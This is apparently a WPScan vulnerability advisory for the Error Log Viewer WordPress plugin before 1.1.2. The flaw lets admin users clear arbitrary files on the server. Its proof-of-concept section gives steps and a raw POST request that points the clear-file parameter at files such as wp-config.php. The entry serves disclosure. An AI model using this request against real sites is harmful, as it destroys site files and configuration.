WordPress Plugin Vulnerabilities
Error Log Viewer Plugin < 1.1.2 - Admin+ Arbitrary File Clearing
Description
The plugin does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder
Proof of Concept
Click the "Log Monitor" available under Error Log Viewer menu item. Choose a log file to clear. Intercept the request via Burp or any other local proxy tool. Replace the value of the parameter "rrrlgvwr_clear_file_name" with a file path which is going to be cleared, such as /var/www/html/wp-config.php. Check the content of the cleared file. You will see that the file is empty. POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 603 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 rrrlgvwr_clear_file=&rrrlgvwr_clear_file_name=/var/www/secret.php&rrrlgvwr_nonce_name=696d5e6ba3
Affects Plugins
Fixed in 1.1.2 References
CVE
Classification
Type
FILE DELETION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Ceylan Bozogullarindan
Submitter
Ceylan Bozogullarindan
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-10 (about 2 years ago)
Added
2022-02-15 (about 2 years ago)
Last Updated
2024-03-21 (about 1 months ago)
WPScan 